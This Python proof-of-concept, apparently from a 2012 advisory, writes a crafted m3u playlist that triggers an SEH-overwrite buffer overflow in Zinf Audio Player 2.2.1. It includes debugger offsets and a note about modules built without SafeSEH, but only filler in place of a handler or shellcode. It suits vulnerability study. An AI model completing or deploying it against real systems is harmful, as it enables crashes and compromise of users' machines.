#!/usr/bin/python
#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer. On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------
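def print_banner():
    """Print the advisory header of this proof-of-concept to stdout.

    The original mixed Python 2 ``print`` statements with ``print(...)``
    calls, which is a SyntaxError on Python 3.  Using the single-argument
    ``print(...)`` form renders identically on Python 2 and 3.  Every line
    keeps its original text, including the trailing ``\\n`` that makes the
    output double-spaced.
    """
    lines = [
        "Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n",
        "Version: 2.2.1\n",
        "Date: 3-18-2012\n",
        "Author: mAniNdArK\n",
        "Software Link: http://www.zinf.org\n",
        "Category: Local\n",
        "Tested on: Windows XP SP3 Professional(En)\n",
        "Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n",
        "34GL3_3Y3,5!L3NT @[email protected]!N,s1l3n7 BD,\n",
        "Rudr0 Akash,p5YcH0 d0d93r And All The Members\n",
        "Of Bangladesh Cyber Army(BCA)\n",
        "Mail:[email protected]",
        "---------------------------------------------------------\n",
    ]
    for line in lines:
        print(line)


print_banner()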
#0198F9B4 41414141 AAAA
#0198F9B8 41414141 AAAA
#0198F9BC 41414141 AAAA
#0198F9C0 41414141 AAAA
#0198F9C4 41414141 AAAA
#0198F9C8 41414141 AAAA
#0198F9CC 41414141 AAAA
#0198F9D0 41414141 AAAA
#0198F9D4 41414141 AAAA
#0198F9D8 41414141 AAAA
#0198F9DC 41414141 AAAA
#0198F9E0 41414141 AAAA
#0198F9E4 41414141 AAAA
#0198F9E8 41414141 AAAA
#0198F9EC 41414141 AAAA
#0198F9F0 41414141 AAAA
#0198F9F4 41414141 AAAA
#0198F9F8 41414141 AAAA
#0198F9FC 42424242 BBBB Pointer to next SEH record
#0198FA00 43434343 CCCC SE handler
#0198FA08 90909090 ....
#0198FA0C 44444444 DDDD
#0198FA10 44444444 DDDD
#Instructions:
#Right click and select "Open...",
#then select the playlist file poc.m3u
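# Layout of the crafted playlist, matching the debugger dump in the comments
# above.  Every field is a recognisable filler pattern: no handler address and
# no payload is included, so the file only reproduces the crash and lets the
# offsets of the exception-registration record be read back from the dump.
file = "poc.m3u"                 # output path (name kept for compatibility; shadows the Py2 builtin)
junk = b"\x41" * 12148           # 'A' padding up to the SEH record
nseh = b"B" * 4                  # filler at the "pointer to next SEH record" slot (shows as 42424242)
seh = b"C" * 4                   # filler at the SE-handler slot (shows as 43434343)
nop = b"\x90" * 8                # eight 0x90 bytes following the record
shellcode = b"D" * 1000          # 'D' filler where the original author left room for a payload
# NOTE(original author): some modules shipped with the player (download.ui is
# named) were built without SafeSEH, so that mitigation does not cover every
# image loaded by the process.


def build_payload(junk=junk, nseh=nseh, seh=seh, nop=nop, shellcode=shellcode):
    """Return the playlist body as bytes: the five fields concatenated.

    The parameters default to the module-level markers, so the result is
    byte-identical to what the original script wrote.
    """
    return junk + nseh + seh + nop + shellcode


def write_poc(path=file, payload=None):
    """Write *payload* (default: ``build_payload()``) to *path*; report success.

    Fixes relative to the original script:
    - the ``try`` body was not indented, which is a SyntaxError;
    - the file is opened in binary mode -- on Python 3 text mode would UTF-8
      encode each 0x90 byte into two bytes;
    - ``with`` closes the handle even when the write fails (the original
      leaked it on error);
    - only I/O errors are caught, so a bug in the script itself is no longer
      hidden behind the generic "Error while creating file" message.

    Returns True when the file was written, False when an IOError/OSError
    occurred (the reason is printed alongside the original message).
    """
    if payload is None:
        payload = build_payload()
    print("[*] Creating exploit file...\n")
    try:
        with open(path, "wb") as out:
            out.write(payload)
    except (IOError, OSError) as err:  # IOError is an alias of OSError on Py3; both exist on Py2
        print("[!] Error while creating file! (%s)" % err)
        return False
    print("[*] File successfully created!")
    return True


write_poc()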